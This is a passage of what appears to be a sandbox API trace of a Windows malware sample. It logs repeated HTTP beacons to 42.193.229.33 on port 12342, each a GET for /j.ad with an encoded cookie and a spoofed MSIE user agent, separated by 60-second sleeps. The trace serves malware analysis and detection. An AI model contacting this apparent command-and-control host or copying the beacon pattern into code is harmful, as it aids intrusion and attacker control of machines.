0xcc0008 [0276.326] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0276.326] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0276.326] GetLastError () returned 0x0 [0276.328] htonl (hostlong=0x7000000) returned 0x7 [0276.328] htonl (hostlong=0x0) returned 0x0 [0276.328] htonl (hostlong=0x3000000) returned 0x3 [0276.328] htonl (hostlong=0x6000000) returned 0x6 [0276.328] htonl (hostlong=0x6000000) returned 0x6 [0276.328] GetLastError () returned 0x0 [0276.328] htonl (hostlong=0x0) returned 0x0 [0276.328] GetLastError () returned 0x0 [0276.328] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0276.329] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0278.308] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0278.308] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0278.308] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0278.308] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0278.309] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0278.309] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0278.309] Sleep (dwMilliseconds=0xea60) [0278.314] GetLastError () returned 0x2efd [0278.314] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0278.314] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0278.315] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0278.315] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0278.315] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0278.315] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0278.315] GetLastError () returned 0x0 [0278.315] htonl (hostlong=0x7000000) returned 0x7 [0278.315] htonl (hostlong=0x0) returned 0x0 [0278.315] htonl (hostlong=0x3000000) returned 0x3 [0278.315] htonl (hostlong=0x6000000) returned 0x6 [0278.315] htonl (hostlong=0x6000000) returned 0x6 [0278.315] GetLastError () returned 0x0 [0278.315] htonl (hostlong=0x0) returned 0x0 [0278.315] GetLastError () returned 0x0 [0278.316] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0278.316] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0280.340] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0280.340] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0280.340] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0280.340] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0280.340] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0280.340] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0280.340] Sleep (dwMilliseconds=0xea60) [0280.354] GetLastError () returned 0x2efd [0280.357] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0280.357] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0280.357] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0280.357] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0280.357] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0280.357] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0280.357] GetLastError () returned 0x0 [0280.357] htonl (hostlong=0x7000000) returned 0x7 [0280.357] htonl (hostlong=0x0) returned 0x0 [0280.357] htonl (hostlong=0x3000000) returned 0x3 [0280.357] htonl (hostlong=0x6000000) returned 0x6 [0280.357] htonl (hostlong=0x6000000) returned 0x6 [0280.357] GetLastError () returned 0x0 [0280.358] htonl (hostlong=0x0) returned 0x0 [0280.358] GetLastError () returned 0x0 [0280.358] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0280.358] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) Thread: id = 11 os_tid = 0xf58 Thread: id = 12 os_tid = 0xf5c Thread: id = 13 os_tid = 0xf60 Thread: id = 14 os_tid = 0xf64 Thread: id = 15 os_tid = 0xf68 Thread: id = 16 os_tid = 0xfc0 Thread: id = 17 os_tid = 0xfec